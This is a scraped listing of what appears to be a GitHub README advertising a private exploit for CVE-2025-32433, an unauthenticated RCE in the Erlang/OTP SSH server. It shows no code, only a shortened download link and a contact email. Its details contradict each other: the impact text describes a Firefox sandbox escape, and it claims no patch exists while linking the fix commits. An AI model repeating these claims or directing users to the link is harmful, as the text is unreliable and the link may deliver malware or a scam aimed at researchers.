来源

关联漏洞

描述

Missing Authentication for Critical Function (CWE-306)-Exploit

介绍

# CVE-2025-32433
A critical vulnerability in Erlang/OTP SSH server allows unauthenticated remote code execution (RCE). The flaw exists in the SSH protocol message handling mechanism, enabling attackers to execute arbitrary commands without requiring authentication credentials.
## Impact
Critical severity vulnerability that enables attackers to potentially: - Escape the browser's sandbox protection - Execute arbitrary code - Compromise system integrity - Gain unauthorized access to system resources This vulnerability specifically targets Firefox on Windows and was being actively exploited in the wild. If  SSH daemon is running as root, the attacker has full access to that device


## Exploit:
## [Download here](https://tinyurl.com/2snpnjcp)
## Details
+ **CVE ID**: CVE-2025-32433

+ **Published**: 04/16/2025

+ **Impact**: Critical
+ **Exploit Availability**: Not public, only private.
+ **CVSS**: 10
+ **Patch Available:  (No official patch yet)**


## Affected Versions
Erlang/OTP SSH

## Contact
+ **For inquiries, please contact:hovovi8373@outlook.com**

## Hyperlinks Resource
+ http://www.openwall.com/lists/oss-security/2025/04/16/2	
+ http://www.openwall.com/lists/oss-security/2025/04/18/1	
+ https://github.com/erlang/otp/commit/0fcd9c56524b28615e8ece65fc0c3f66ef6e4c12	
+ https://github.com/erlang/otp/commit/6eef04130afc8b0ccb63c9a0d8650209cf54892f	
+ https://github.com/erlang/otp/commit/b1924d37fd83c070055beb115d5d6a6a9490b891	
+ https://github.com/erlang/otp/security/advisories/GHSA-37cp-fgq5-7wc2

文件快照

 [4.0K]  /data/pocs/228e3794c0521709169de16786e17a3ae3534990
└── [1.5K]  README.md

0 directories, 1 file

备注